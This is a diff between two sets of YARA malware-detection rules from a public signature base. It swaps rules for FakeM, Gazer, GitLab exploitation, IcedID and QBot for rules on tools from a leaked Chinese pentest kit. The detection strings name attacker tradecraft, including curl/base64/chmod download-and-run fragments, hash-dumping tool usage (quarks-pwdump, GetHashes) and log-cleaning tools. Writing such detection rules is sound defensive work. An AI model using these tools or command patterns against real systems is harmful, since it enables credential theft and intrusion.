-		$s2 = "%s\\appdata\\roaming\\%s" fullword ascii
-		$s3 = "WINDOWS\\SYSTEM32\\TASKS" fullword ascii
+		$s14 = "* FROM IIsWebInfo/r" fullword ascii
+		$s19 = "ltithread4ck/" ascii
+		$s20 = "LookupAcc=Sid#" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 400KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 175KB and all of them
 }
-rule SIGNATURE_BASE_Fakem_Generic : FILE
+rule SIGNATURE_BASE_CN_Honker_Clearlogs : FILE
 {
 	meta:
-		description = "Detects FakeM malware samples"
+		description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51a285ce-a4cb-5068-b079-a8227690365f"
-		date = "2016-01-25"
-		modified = "2023-01-06"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fakem_backdoor.yar#L8-L49"
+		id = "bfbc339e-5530-5984-94de-be1002f09ca1"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1720-L1736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0ee606be48961d1e4c1fd9e0e10b53603cfd62cec652baef62f893c0a9e9684c"
-		score = 85
+		hash = "490f3bc318f415685d7e32176088001679b0da1b"
+		logic_hash = "ed961d2850ba86743177976a4516e7d4a8b90b7e8f180c03f5dbbcc794ad1084"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
-		hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
-		hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
-		hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
-		hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
-		hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
-		hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
-		hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
-		hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
-		hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
-		hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
 
 	strings:
-		$a1 = "\\system32\\kernel32.dll" ascii
-		$a2 = "\\boot.lnk" ascii
-		$a3 = "%USERPROFILE%" fullword ascii
-		$b1 = "Wizard.EXE" fullword wide
-		$b2 = "CommandLineA" fullword ascii
-		$c1 = "\\system32\\kernel32.dll" ascii
-		$c2 = "\\aapz.tmp" ascii
-		$e1 = "C:\\Documents and Settings\\A\\" ascii
-		$e2 = "\\svchost.exe" ascii
-		$e3 = "\\Perform\\Release\\Perform.pdb" ascii
-		$f1 = "Browser.EXE" fullword wide
-		$f2 = "\\browser.exe" ascii
+		$s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii
+		$s4 = "Error: Unable to clear log - " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $e* ) or 1 of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_VULN_DRV_PROCEXP152_May23 : FILE
+rule SIGNATURE_BASE_CN_Honker_No_Net_Priv_Esc_Adduser : FILE
 {
 	meta:
-		description = "Detects vulnerable process explorer driver (original file name: PROCEXP152.SYS), often used by attackers to elevate privileges (false positives are possible in cases in which old versions of process explorer are still present on the system)"
-		author = "Florian Roth"
-		id = "748eb390-f320-5045-bed2-24ae70471f43"
-		date = "2023-05-05"
-		modified = "2023-07-28"
-		reference = "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor_inverse_matches.yar#L502-L520"
+		description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1738-L1754"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d988bba837b91b2ad7f69be8765a948848bce21e2daa53af602f714758cda4d4"
-		score = 50
+		hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
+		logic_hash = "743e67e2aa95830034db1afda1f346c30467c7b59e030ed27415e5127013be74"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "\\ProcExpDriver.pdb" ascii
-		$a2 = "\\Device\\PROCEXP152" wide fullword
-		$a3 = "procexp.Sys" wide fullword
+		$s0 = "PECompact2" fullword ascii
+		$s1 = "adduser" fullword ascii
+		$s5 = "OagaBoxA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
 }
-rule SIGNATURE_BASE_Gazer_Certificate_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Injection : FILE
 {
 	meta:
-		description = "Detects Tura's Gazer malware"
-		author = "ESET"
-		id = "4eace653-003e-5cae-9db8-f26502f35fc4"
-		date = "2017-08-30"
+		description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_gazer.yar#L27-L39"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1756-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef248ac5cdde0034d940f80b32966fe64841dcf99923dfc0a7035354af963f56"
-		score = 75
+		hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
+		logic_hash = "8de3e59bd118fbbf1a012c6bfb358dba7c8fb758e3ac17277f2ad3a92c0284ba"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
-		$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
+		$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii
+		$s7 = "jmPost.asp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them and filesize < 2MB
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-rule SIGNATURE_BASE_Gazer_Logfile_Name_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sqlserver_Inject_Creaked : FILE
 {
 	meta:
-		description = "Detects Tura's Gazer malware"
-		author = "ESET"
-		id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
-		date = "2017-08-30"
+		description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a8a77c2-9e06-5694-8055-4480ab932520"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_gazer.yar#L41-L54"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1773-L1788"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c893ec41884f106329350c079b087e41a5b9f1040ab0892c90c03972d49dc070"
-		score = 75
+		hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
+		logic_hash = "2a7e913a4b7bb6c1270d862108eae7ed3998114b672ca7fa19bd0b199fc27dc2"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CVRG72B5.tmp.cvr"
-		$s2 = "CVRG1A6B.tmp.cvr"
-		$s3 = "CVRG38D9.tmp.cvr"
+		$s1 = "http://localhost/index.asp?id=2" fullword ascii
+		$s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 8110KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_BAT_Aux_Jan20_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webscan_Webscan : FILE
 {
 	meta:
-		description = "Detects BAT file often dropped to cleanup temp dirs during infection"
+		description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c97f189e-a0c2-532e-b087-8669da72a2ad"
-		date = "2020-01-29"
+		id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_bat_aux.yar#L2-L19"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1790-L1805"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b8cd9b7683a18a02a81222d6819fe903500702c83f198f73ac428d1bc91fb9a"
-		score = 65
+		hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
+		logic_hash = "a714fe90dce33180b8074e2c3a16fc1829ed2a7b387eb92aec8a147cff9e57a4"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "f5d558ec505b635b1e37557350562ad6f79b3da5cf2cf74db6e6e648b7a47127"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if exist \"C:\\Users\\" ascii
-		$s2 = "\\AppData\\Local\\Temp\\" ascii
-		$s3 = "del \"C:\\Users\\" ascii
-		$s4 = ".bat\"" ascii
-		$s5 = ".exe\" goto" ascii
+		$s1 = "wwwscan.exe" fullword wide
+		$s2 = "WWWScan Gui" fullword wide
 
 	condition:
-		uint8( 0 ) == 0x3a and filesize <= 1KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Linux_Malware_Indicators_Aug20_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Gethashes_2 : FILE
 {
 	meta:
-		description = "Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
+		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a1093a6-0239-5d1c-aa30-1ca725941583"
-		date = "2020-08-03"
-		modified = "2026-01-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_lnx_malware_indicators.yar#L1-L25"
+		id = "31117d2e-caf1-58c9-8525-b40b73097928"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1807-L1823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d07d424f2a66b60e55d21dff6d4c4f9f2591c3ab622dcfbc1cd989d28b44017"
-		score = 65
+		hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
+		logic_hash = "778fde2c59d4523142c0ac5b5c953c9eedbbf3c00b406541c00c1aa1f1a9cc58"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "&& chmod +x" ascii
-		$s2 = "|base64 -" ascii
-		$s3 = " /tmp" ascii
-		$s4 = "|curl " ascii
-		$s5 = "whoami" ascii fullword
-		$fp1 = "WITHOUT ANY WARRANTY" ascii
-		$fp2 = "postinst" ascii fullword
-		$fp3 = "THIS SOFTWARE IS PROVIDED" ascii fullword
-		$fp4 = "Free Software Foundation" ascii fullword
-		$fp5 = "Too many sessions open! Use ssh_channel.close() or 'with'!"
+		$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii
+		$s2 = "GetHashes.exe $Local" fullword ascii
+		$s3 = "The system key doesn't match SAM registry file!" fullword ascii
 
 	condition:
-		filesize < 400KB and 3 of ( $s* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Lightftp_Fftp_X86_64 : FILE
+rule SIGNATURE_BASE_SUSP_Patcher_Keygen_Indicators_Jun15 : FILE
 {
 	meta:
-		description = "Detects a light FTP server"
+		description = "Sample from CN Honker Pentest Toolset"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b62e990-1d8b-5d30-bb58-1f7f12552834"
-		date = "2015-05-14"
+		id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/LightFTP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pup_lightftp.yar#L2-L21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1825-L1841"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f29a98a4014fc6c026aef4054bc2bee7bde2e9ad7f26f2368fdf0949f50847bb"
-		score = 50
+		hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
+		logic_hash = "07735c380cf34aaabd5cc0e1b38e32b3d4ad86b7bb184188d446df537f66775e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
-		hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
 
 	strings:
-		$s1 = "fftp.cfg" fullword wide
-		$s2 = "220 LightFTP server v1.0 ready" fullword ascii
-		$s3 = "*FTP thread exit*" fullword wide
-		$s4 = "PASS->logon successful" fullword ascii
-		$s5 = "250 Requested file action okay, completed." fullword ascii
+		$s0 = "<description>Patch</description>" fullword ascii
+		$s2 = "\\dup2patcher.dll" ascii
+		$s3 = "load_patcher" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Lightftp_Config : FILE
+rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_Oracle_2 : FILE
 {
 	meta:
-		description = "Detects a light FTP server - config file"
+		description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02ee1d04-1425-5dfd-9b9a-cd378aeda311"
-		date = "2015-05-14"
+		id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/LightFTP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pup_lightftp.yar#L23-L41"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1843-L1858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ce9821213538d39775af4a48550eefa3908323c5"
-		logic_hash = "1e8c06dac9a5910816703ed15bef83116d9e2d9e612fda69697170ed98ee5f60"
-		score = 75
+		hash = "865dd591b552787eda18ee0ab604509bae18c197"
+		logic_hash = "627d81323266d67a2402367918b4f6e7277367c3eb027af57ac6966f2a49472c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "maxusers=" wide
-		$s6 = "[ftpconfig]" fullword wide
-		$s8 = "accs=readonly" fullword wide
-		$s9 = "[anonymous]" fullword wide
-		$s10 = "accs=" fullword wide
-		$s11 = "pswd=" fullword wide
+		$s0 = "webshell" fullword ascii
+		$s1 = "Silic Group Hacker Army " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 1KB and all of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_CVE_2021_22205 : CVE_2021_22205
+rule SIGNATURE_BASE_CN_Honker_Net_Packet_Capt : FILE
 {
 	meta:
-		description = "Detects signs of exploitation of GitLab CE CVE-2021-22205"
+		description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21cc6fa7-e50d-5b8e-815d-27315ab5635d"
-		date = "2021-10-26"
+		id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_gitlab_cve_2021_22205.yar#L2-L27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1860-L1878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "54b841716a6bd56706c1c38fcda9a27ffd7feba2660602b191e8e347983e578d"
+		hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
+		logic_hash = "b158199a27f1260da5f5c1a8e99bb1cc3d19fe2a10577cc5932f097ff39d4ef8"
 		score = 70
 		quality = 85
-		tags = "CVE-2021-22205"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "VXNlci5maW5kX2J5KHVzZXJuYW1l" ascii
-		$sa2 = "VzZXIuZmluZF9ieSh1c2VybmFtZ" ascii
-		$sa3 = "Vc2VyLmZpbmRfYnkodXNlcm5hbW" ascii
-		$sb1 = "dXNlci5hZG1pb" ascii
-		$sb2 = "VzZXIuYWRtaW" ascii
-		$sb3 = "1c2VyLmFkbWlu" ascii
-		$sc1 = "dXNlci5zYXZlI" ascii
-		$sc2 = "VzZXIuc2F2ZS" ascii
-		$sc3 = "1c2VyLnNhdmUh" ascii
+		$s1 = "(*.sfd)" fullword ascii
+		$s2 = "GetLaBA" fullword ascii
+		$s3 = "GAIsProcessorFeature" fullword ascii
+		$s4 = "- Gablto " ascii
+		$s5 = "PaneWyedit" fullword ascii
 
 	condition:
-		1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_Malformed_JPG_CVE_2021_22204 : CVE_2021_22204 CVE_2021_22205 FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaniislog : FILE
 {
 	meta:
-		description = "Detects malformed JPG files exploting EXIF vulnerability CVE-2021-22204 and used in the exploitation of GitLab vulnerability CVE-2021-22205"
+		description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3d769340-0306-596d-8783-2b37b93a5673"
-		date = "2021-10-26"
+		id = "3931ba63-faf5-5b44-879c-105cd2812712"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_gitlab_cve_2021_22205.yar#L29-L44"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1880-L1894"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0718ad24337acbb746c6e0d7e0b42d2d034ff583ec6fd12b34fda4737d7e78b0"
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+		logic_hash = "35b428d6178196b0dc6ac2ea3f0ee1dfbf6a98ead2356cb2a35d3d6b780538cc"
 		score = 70
-		quality = 58
-		tags = "CVE-2021-22204, CVE-2021-22205, FILE"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = { 41 54 26 54 46 4F 52 4D }
-		$sr1 = /\(metadata[\s]{0,3}\([A-Za-z]{1,20} "\\/
+		$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii
 
 	condition:
-		filesize < 10KB and $h1 and $sr1
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Icedid_GZIP_LDR_202104 : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_Pwhash : FILE
 {
 	meta:
-		description = "2021 initial Bokbot / Icedid loader for fake GZIP payloads"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "fbf578e7-c318-5f67-82df-f93232362a23"
-		date = "2021-04-12"
-		modified = "2023-01-27"
-		reference = "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_icedid.yar#L14-L40"
+		description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1896-L1911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a7cc6c7dcbf43bace6a1f259af38560327c34386517e719ad81068b2d9b6659"
-		score = 75
+		hash = "689056588f95749f0382d201fac8f58bac393e98"
+		logic_hash = "a77ae11c35dac3cfb1a2970460d4883feed7fbd3e8a860fa7facaad7ddcd1182"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$internal_name = "loader_dll_64.dll" fullword
-		$string0 = "_gat=" wide
-		$string1 = "_ga=" wide
-		$string2 = "_gid=" wide
-		$string4 = "_io=" wide
-		$string5 = "GetAdaptersInfo" fullword
-		$string6 = "WINHTTP.dll" fullword
-		$string7 = "DllRegisterServer" fullword
-		$string8 = "PluginInit" fullword
-		$string9 = "POST" wide fullword
-		$string10 = "aws.amazon.com" wide fullword
+		$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii
+		$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Qbot_HTML_Smuggling_Indicators_Oct22_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaner_Cl_2 : FILE
 {
 	meta:
-		description = "Detects double encoded PKZIP headers as seen in HTML files used by QBot"
+		description = "Sample from CN Honker Pentest Toolset - file cl.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8034d6af-4dae-5ff6-b635-efb5175fe4d1"
-		date = "2022-10-07"
+		id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_qbot_payloads.yar#L2-L55"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1913-L1928"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a5bd9eb72205f1398ec0b8773751309699b3267e0272dacf2728f8495c0c0ec2"
-		score = 75
-		quality = 83
+		hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
+		logic_hash = "865354152f8441009aaad9022f64c3a014c4df0549b648d66959df56893ab98a"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f"
-		hash2 = "8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b"
-		hash3 = "c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a"
-		hash4 = "5072d91ee0d162c28452123a4d9986f3df6b3244e48bf87444ce88add29dd8ed"
-		hash5 = "ff4e21f788c36aabe6ba870cf3b10e258c2ba6f28a2d359a25d5a684c92a0cad"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sd1 = "VUVzREJCUUFBUUFJQ"
-		$sd2 = "VFc0RCQlFBQVFBSU"
-		$sd3 = "VRXNEQkJRQUFRQUlB"
-		$sdr1 = "QJFUUBFUUCJERzVUV"
-		$sdr2 = "USBFVQBFlQCR0cFV"
-		$sdr3 = "BlUQRFUQRJkQENXRV"
-		$st1 = "VlVWelJFSkNVVUZCVVVGSl"
-		$st2 = "ZVVnpSRUpDVVVGQlVVRkpR"
-		$st3 = "WVVZ6UkVKQ1VVRkJVVUZKU"
-		$st4 = "VkZjMFJDUWxGQlFWRkJTV"
-		$st5 = "ZGYzBSQ1FsRkJRVkZCU1"
-		$st6 = "WRmMwUkNRbEZCUVZGQlNV"
-		$st7 = "VlJYTkVRa0pSUVVGUlFVbE"
-		$st8 = "ZSWE5FUWtKUlFVRlJRVWxC"
-		$st9 = "WUlhORVFrSlJRVUZSUVVsQ"
-		$str1 = "UUpGVVVCRlVVQ0pFUnpWVV"
-		$str2 = "FKRlVVQkZVVUNKRVJ6VlVW"
-		$str3 = "RSkZVVUJGVVVDSkVSelZVV"
-		$str4 = "VVNCRlZRQkZsUUNSMGNGV"
-		$str5 = "VTQkZWUUJGbFFDUjBjRl"
